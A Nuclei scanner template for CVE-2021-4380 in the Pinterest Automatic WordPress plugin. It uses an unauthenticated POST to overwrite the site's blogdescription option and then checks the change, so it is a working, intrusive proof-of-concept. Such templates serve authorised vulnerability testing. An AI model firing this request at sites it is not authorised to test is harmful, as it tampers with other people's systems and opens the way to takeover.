id: CVE-2021-4380

info:
  name: Pinterest Automatic < 4.14.4 - Unauthenticated Arbitrary Options Update
  author: s4e-io
  severity: critical
  description: |
    The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.
  impact: |
    Unauthenticated attackers can update arbitrary WordPress options including creating administrative accounts or redirecting site visitors to malicious content.
  remediation: Fixed in 4.14.4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4380
    - https://wpscan.com/vulnerability/ffd344fd-de2c-4f27-8932-41aa0a3c3d05
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4380
    epss-score: 0.04528
    epss-percentile: 0.90318
    cpe: cpe:2.3:a:valvepress:pinterest_automatic_pin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: valvepress
    product: pinterest_automatic_pin
    framework: wordpress
  tags: cve,cve2021,wordpress,wp,wp-plugin,wp,vkev,intrusive,pinterest-automatic-pin,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "site-description")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: common-blog-description
        part: body
        group: 1
        regex:
          - '<div class="site-description">(.*?)</div>'
        internal: true

  - raw:
      - |
        POST /?wp_pinterest_automatic=settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        blogdescription={{common-blog-description}}!

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'len(body)==0'
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{common-blog-description}}!")'
        condition: and
# digest: 490a004630440220592a05ab6abb6b396b8a3cf8cf6a9b9eaa35a512724ff99f89ca069bc41ddb94022026c64554f7478cc940e7f0194ab73a0308bfe4384b457630701da84bc183ab02:922c64590222798bb761d5b6d8e72950